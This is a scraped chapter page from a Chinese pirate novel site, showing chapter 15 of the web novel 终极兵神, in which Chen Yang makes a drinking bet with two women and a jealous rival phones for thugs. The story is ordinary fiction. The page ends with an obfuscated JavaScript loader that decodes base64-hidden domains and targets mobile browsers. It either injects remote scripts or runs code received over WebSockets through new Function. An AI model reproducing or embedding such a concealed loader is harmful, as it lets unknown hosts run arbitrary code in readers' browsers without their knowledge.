笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 终极兵神 > 第15章 我家大叔

第15章 我家大叔

不想错过《笔趣阁》更新?安装笔趣阁专用APP,作者更新立即推送!

放弃立即下载
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“要我陪你们两个喝酒可以。不过总得有点彩头吧。”陈阳望着两女笑道。
  “你想要什么彩头呢?”李湘云媚笑地问着。对于自己的酒量李湘云可是有信心的。何况再加上苏嫣然。她们不可能有输掉的理由。
  “只要你肯三杯顶一杯陪我们喝。无论什么样的彩头,我们都能答应你。”苏嫣然认真地说道。
  陈阳看到两人自信满满,他也不客气,他贼贼地笑道,“要是到时候我赢了。你们两人一人给我亲一下小嘴。怎样?”
  啊!
  李湘云和苏嫣然错愕一下。她们错愕的原因,是想不明白,陈阳从那里来那么大的信心。
  瞧着陈阳那表情,李湘云心里则有点动摇。她心里暗想着,莫非这家伙扮猪吃老虎?
  苏嫣然倒管不上那么多,她爽快地应道,“好。要是你输的话,我们今晚就将你丢在外面。你同意吗?”
  “没问题!”
  陈阳同样爽快地答着。
  “那先走一个。”苏嫣然端着一杯红酒,她就一口干掉,接着她脸上就浮起点绯红笑着,“到你了,三杯!”
  小样的,敢欺负姑奶奶,今晚就让你在外面跟乞丐一起过夜。
  “干就干,不过丑话说在前面,谁要是赖账的话。谁就是乌龟王八蛋。”陈阳端起红酒就干了一杯。
  噗!噗!
  李湘云差点没有再次喷了。她真的佩服陈阳这番勇气。
  苏嫣然觉得这样自然最好,她就催促着说道,“好。谁赖账谁就是乌龟王八蛋。还有两杯,你赶紧的。”
  苏嫣然已经打定主意,她负责红酒。李湘云负责洋酒。
  到时候陈阳两种酒都要喝,不醉死他才怪。
  坐在一旁的李湘云也无语了。难得苏嫣然开心,她也只好陪着她胡闹。她心里想着,陈阳只好自求多福。
  角落处不显眼的三人正在拼着酒。
  此时在不远处一个穿着皮衣皮裤的少女,正不停地往着陈阳的方向看着。
  “依心,你总往那里看。你不是想告诉我,你看那个大叔了吧?”
  这时唐依心身边就有一个染着五颜六色头发流里流气的男人带点不爽说道,“那大叔陪着两个女人,一看就是鸭子。”
  “呸,朱星波闭上你的臭嘴。我喜欢谁,关你什么事呢?”唐依心不爽地说道,“你才是鸭子。你全家都是鸭子。”
  唐依心暗忖着,这么历害的男人,有什么可能是鸭子。就算是鸭子,也是一个历害的鸭子。
  朱星波听到唐依心为了别的男人骂自己,他脸色就挂不住,他不爽地哼着,“依心,你不会真的看上他了吧。”
  “我是看上他了。那又怎样?”唐依心努着小嘴巴说道。
  “你要是看上他。我就喊人来揍他。”朱星波咬咬牙说着,“敢跟我抢女人,下场就是死。”
  唐依心看到朱星波的表情,她就露出几分得意说道,“朱星波,我不怕告诉你。我就看上他了。他是我家大叔。你敢找人揍他,我跟你没完。”
  听着唐依心这话,朱星波这会就受刺激。他拍着桌子说道,“那走着瞧。”
  朱星波说完,他就掏着手机,走出打电话喊人。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x52\x52\x4c\x68\x73\x58\x53\x6b\x7a\x5a']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vbbGtkamZzbbC54YXFkZi5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};